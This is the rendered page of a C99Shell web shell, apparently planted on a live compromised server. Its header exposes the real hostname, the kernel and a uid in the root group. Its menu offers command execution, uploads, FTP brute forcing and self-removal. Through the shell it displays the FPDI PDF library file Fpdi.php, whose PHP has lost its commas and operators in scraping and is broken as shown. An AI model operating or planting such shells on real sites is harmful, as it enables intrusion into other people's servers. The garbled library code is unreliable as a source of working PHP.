!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/vendor/setasign/fpdi/src/   drwxr-xr-x
Free 25.32 GB of 117.98 GB (21.46%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Fpdi.php (4.66 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This file is part of FPDI
 *
 * @package   setasign\Fpdi
 * @copyright Copyright (c) 2020 Setasign GmbH & Co. KG (https://www.setasign.com)
 * @license   http://opensource.org/licenses/mit-license The MIT License
 */

namespace setasign\Fpdi;

use 
setasign\Fpdi\PdfParser\CrossReference\CrossReferenceException;
use 
setasign\Fpdi\PdfParser\PdfParserException;
use 
setasign\Fpdi\PdfParser\Type\PdfIndirectObject;
use 
setasign\Fpdi\PdfParser\Type\PdfNull;

/**
 * Class Fpdi
 *
 * This class let you import pages of existing PDF documents into a reusable structure for FPDF.
 */
class Fpdi extends FpdfTpl
{
    use 
FpdiTrait;

    
/**
     * FPDI version
     *
     * @string
     */
    
const VERSION '2.3.6';

    protected function 
_enddoc()
    {
        
parent::_enddoc();
        
$this->cleanUp();
    }

    
/**
     * Draws an imported page or a template onto the page or another template.
     *
     * Give only one of the size parameters (width, height) to calculate the other one automatically in view to the
     * aspect ratio.
     *
     * @param mixed $tpl The template id
     * @param float|int|array $x The abscissa of upper-left corner. Alternatively you could use an assoc array
     *                           with the keys "x", "y", "width", "height", "adjustPageSize".
     * @param float|int $y The ordinate of upper-left corner.
     * @param float|int|null $width The width.
     * @param float|int|null $height The height.
     * @param bool $adjustPageSize
     * @return array The size
     * @see Fpdi::getTemplateSize()
     */
    
public function useTemplate($tpl$x 0$y 0$width null$height null$adjustPageSize false)
    {
        if (isset(
$this->importedPages[$tpl])) {
            
$size $this->useImportedPage($tpl$x$y$width$height$adjustPageSize);
            if (
$this->currentTemplateId !== null) {
                
$this->templates[$this->currentTemplateId]['resources']['templates']['importedPages'][$tpl] = $tpl;
            }
            return 
$size;
        }

        return 
parent::useTemplate($tpl$x$y$width$height$adjustPageSize);
    }

    
/**
     * Get the size of an imported page or template.
     *
     * Give only one of the size parameters (width, height) to calculate the other one automatically in view to the
     * aspect ratio.
     *
     * @param mixed $tpl The template id
     * @param float|int|null $width The width.
     * @param float|int|null $height The height.
     * @return array|bool An array with following keys: width, height, 0 (=width), 1 (=height), orientation (L or P)
     */
    
public function getTemplateSize($tpl$width null$height null)
    {
        
$size parent::getTemplateSize($tpl$width$height);
        if (
$size === false) {
            return 
$this->getImportedPageSize($tpl$width$height);
        }

        return 
$size;
    }

    
/**
     * @inheritdoc
     * @throws CrossReferenceException
     * @throws PdfParserException
     */
    
protected function _putimages()
    {
        
$this->currentReaderId null;
        
parent::_putimages();

        foreach (
$this->importedPages as $key => $pageData) {
            
$this->_newobj();
            
$this->importedPages[$key]['objectNumber'] = $this->n;
            
$this->currentReaderId $pageData['readerId'];
            
$this->writePdfType($pageData['stream']);
            
$this->_put('endobj');
        }

        foreach (
\array_keys($this->readers) as $readerId) {
            
$parser $this->getPdfReader($readerId)->getParser();
            
$this->currentReaderId $readerId;

            while ((
$objectNumber \array_pop($this->objectsToCopy[$readerId])) !== null) {
                try {
                    
$object $parser->getIndirectObject($objectNumber);
                } catch (
CrossReferenceException $e) {
                    if (
$e->getCode() === CrossReferenceException::OBJECT_NOT_FOUND) {
                        
$object PdfIndirectObject::create($objectNumber0, new PdfNull());
                    } else {
                        throw 
$e;
                    }
                }

                
$this->writePdfType($object);
            }
        }

        
$this->currentReaderId null;
    }

    
/**
     * @inheritdoc
     */
    
protected function _putxobjectdict()
    {
        foreach (
$this->importedPages as $key => $pageData) {
            
$this->_put('/' $pageData['id'] . ' ' $pageData['objectNumber'] . ' 0 R');
        }

        
parent::_putxobjectdict();
    }

    
/**
     * @inheritdoc
     */
    
protected function _put($s$newLine true)
    {
        if (
$newLine) {
            
$this->buffer .= $s "\n";
        } else {
            
$this->buffer .= $s;
        }
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0039 ]--